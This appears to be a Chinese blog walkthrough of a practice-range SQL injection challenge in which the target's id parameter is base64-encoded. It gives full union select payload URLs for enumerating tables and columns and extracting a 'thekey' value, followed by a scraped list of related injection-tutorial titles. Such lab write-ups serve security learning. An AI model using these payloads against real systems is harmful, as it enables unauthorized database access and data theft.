无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程!

SQL注入实战

靶场地址:http://219.153.49.228:48204/show.php?id=MQ==

首先可以看到该URL中存在一个参数“MQ==”,从参数的格式来看是通过了base64进行了加密,那么我们可以对其进行base64解密

发现解密之后的参数为1,这种类型的注入除了和我们以前的普通注入相比只是多了一个“base64”加密的过程,下面进行手工注入演示:

说明:下面的URL为了让读者可以看清,所以没有进行URL的base64加密,但是读者在执行前需要对其进行base64加密,之后才可以正常执行!

1、判断是否可以注入:

单引号测试

and 测试

由上判断可以得知存在SQL注入

2、猜解字段长度

order by  2    

order by 3

可以猜到字段长度为2

3、爆数据库名、数据库版本信息

4、爆表名

http://219.153.49.228:48204/show.php?id=-1 union select TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA=0x74657374 limit 0,1--

5、爆字段名

http://219.153.49.228:48204/show.php?id=-1 union select COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME=0x64617461 limit 3,1

6、爆字段值

http://219.153.49.228:48204/show.php?id=-1 union select thekey,2 from test.data limit 0,1--

至此得到最后的内容!

如有任何疑问,请使用chat快问,扫码提问!博主闭关阶段!

SQL注入实战————1、MySQL手工注入实战相关推荐

  1. SQL注入第二章节MYSQL手工注入

    SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...

  2. php手工注入语句,PHP+MySQL 手工注入语句大全

    我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下. 暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5 ...

  3. mysql 4.0手工注入_手工注入——MySQL手工注入实战和分析

    前言 今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 查 ...

  4. mysql报错注入实战_手工注入——MySQL手工注入实战和分析

    今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 第一步,判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 ...

  5. 【SQL注入】通过实战教你手工注入MySql数据库

    [SQL注入]通过实战教你手工注入MySql数据库 Hello,各位小伙伴们大家晚上好~~ 不知不觉,已经是本公众号的第八篇技术文章了,你们都有认真阅读吗? 正当小编发愁下一篇写什么的时候,鲁迅发话了 ...

  6. mysql union as 注入_sql注入入门 之 mysql 常规注入 [ union方式 ]

    1,常规数字型 mysql 实例注入点,如下:1https://www.vuln.com/md_materia_profile_view.php?viewid=2 2,依旧先尝试下经典的单引号,如下, ...

  7. mysql 手工sql注入_【sql注入专题02】Mysql手工注入流程

    0x00 SQL注入的语句介绍 SQL注入的本质 sql注入的本质就是查询某个数据库下的某个表中的某些字段的内容,比如我们平时在数据库查询一条数据时操作. mysql> use security ...

  8. mysql手工注入imformation_网络安全系列之十八 MySQL基本操作(PHP注入基础)

    在之前的博文中曾介绍过如何对ASP网站进行手工注入,ASP网站大都是采用ACCESS或MSSQL数据库,因而所谓针对ASP的SQL注入其实也就是根据ACCESS或MSSQL数据库的特点来构造查询语句. ...

  9. PHP+MySQL手工注入

    1.发现注入点: 202.1.160.100/xycms/showproducts.php?id=12 and 1=1 202.1.160.100/xycms/showproducts.php?id= ...

最新文章

  1. 触控(Touch) 、 布局(Layout)
  2. goaccess_nginx日志分析工具
  3. h5 server send event(sse)
  4. 互联网知识:工作多年的程序员都说不全
  5. bootstrap 点击按钮刷新_Thyemlef动态刷新页面方法
  6. 又一款代替PanDownload的百度网盘不限速下载工具利器 – 雷鸟下载
  7. ubuntu下锐捷客户端连接校园网
  8. Java项目:宠物店管理系统(java+JSP+JavaScript+Bootstrap+Mysql)
  9. dataload mysql_如何向eova中添加新的数据源呢
  10. Mac操作系统输入法快捷键设置
  11. Java 基础学习笔记
  12. python 手机号码归属 ip地址查询
  13. 苹果cms新手快速入门常见问题汇总及解决教程
  14. HTML中给div加超链接
  15. CSS3 实现可爱的动物动态的哈士奇动画
  16. 南通大学教务管理微信公众号的用户体验
  17. 笔记本电脑的应用、维护、采购全攻略
  18. 2018技术胖Web前端视频教程全套
  19. 对finalize的理解
  20. 英伟达Q3财报解读:营收连续四季度下滑 下一个增长拐点何时来?

热门文章

  1. c++opencvtesseract-ocr截屏处理图像 文字识别
  2. android 误触屏幕失灵,华为手机触摸屏没反应怎么办?解决手机触摸屏时灵时不灵的办法...
  3. CNTK-106 Part A:ValueError
  4. volte 通话通过什么和modem交互?
  5. [ACNOI2022]提交答案题
  6. IOS使用Scriptable安装京豆小组件教程
  7. 微信小程序 学生健康校医院电子病历系统
  8. Win10开机按F8进不了安全模式没反应 Win10开机按F8怎么无法进入安全模式
  9. 关于生成\读取 一维码二维码的方法
  10. chrome“始终在关联的应用中打开这些类型的链接”问题不能修改关联打开应用